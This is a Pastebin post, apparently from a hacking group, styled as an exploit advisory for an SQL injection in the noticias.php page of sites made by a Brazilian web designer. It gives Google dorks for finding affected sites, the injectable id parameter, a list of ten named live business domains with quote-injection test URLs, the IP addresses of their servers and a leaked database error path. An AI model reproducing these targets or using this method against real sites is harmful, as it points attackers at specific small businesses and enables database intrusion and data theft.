API tools faq
paste
Advertisement
KingSkrupellos

Criação sitesrapidos.com.br Web Design Brazil SQL Injection

KingSkrupellos
Jan 16th, 2019
77
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.32 KB | None | 0 0
raw download clone embed print report
  1. ##############################################################
  2.  
  3. # Exploit Title : Criação sitesrapidos.com.br Web Design Brazil SQL Injection
  4. # Author [ Discovered By ] : KingSkrupellos
  5. # Team : Cyberizm Digital Security Army
  6. # Date : 16/01/2019
  7. # Vendor Homepage : sitesrapidos.com.br
  8. # Tested On : Windows and Linux
  9. # Category : WebApps
  10. # Exploit Risk : Medium
  11. # Google Dorks : intext:''criação: sitesrapidos.com.br''
  12. criação: sitesrapidos.com.br inurl:/noticias.php?id=
  13. # Vulnerability Type : CWE-89 [ Improper Neutralization of
  14. Special Elements used in an SQL Command ('SQL Injection') ]
  15.  
  16. ##############################################################
  17.  
  18. # SQL Injection Exploit :
  19. ***********************
  20. /noticias.php?id=[SQL Injection]
  21.  
  22. ##############################################################
  23.  
  24. # Example Vulnerable Sites :
  25. *************************
  26.  
  27. [+] sidermetal.com.br/noticias.php?id=3%27 =>
  28.  
  29. [ Proof of Concept for SQL Inj ] => archive.is/46g98
  30.  
  31. [+] bockrs.com.br/noticias.php?id=3%27
  32.  
  33. [+] sanderagropecuaria.com.br/noticias.php?id=3%27
  34.  
  35. [+] alcancyassessoria.com.br/noticias.php?id=4%27
  36.  
  37. [+] garagetec.com.br/noticias.php?id=68%27
  38.  
  39. [+] ferragemlampiao.com.br/noticias.php?id=1%27
  40.  
  41. [+] marcelokuhn.com.br/noticias.php?id=1%27
  42.  
  43. [+] genialrs.com.br/noticias.php?id=4%27
  44.  
  45. [+] btiseguros.com.br/noticias.php?id=70%27
  46.  
  47. [+] correspondentecaixars.com.br/noticias.php?id=5%27
  48.  
  49. Note : (63.247.92.74) => There are 31 domains hosted on this server.
  50.  
  51. Note : (192.185.170.138) => There are 159 domains hosted on this server.
  52.  
  53. Note : (187.45.193.229) => There are 549 domains hosted on this server.
  54.  
  55. Note : (187.45.210.66) => There are 95 domains hosted on this server.
  56.  
  57. Note : (192.185.170.14) => There are 60 domains hosted on this server.
  58.  
  59. Note : (192.185.31.71) => There are 194 domains hosted on this server.
  60.  
  61. ##############################################################
  62.  
  63. # SQL Database Error :
  64. **********************
  65.  
  66. Warning: mysql_fetch_array(): supplied argument is not a valid
  67. MySQL result resource in /home/httpd/vhosts
  68. /sanderagropecuaria.com.br/httpdocs/noticias.php on line 42
  69.  
  70. ##############################################################
  71.  
  72. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
  73.  
  74. ##############################################################
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!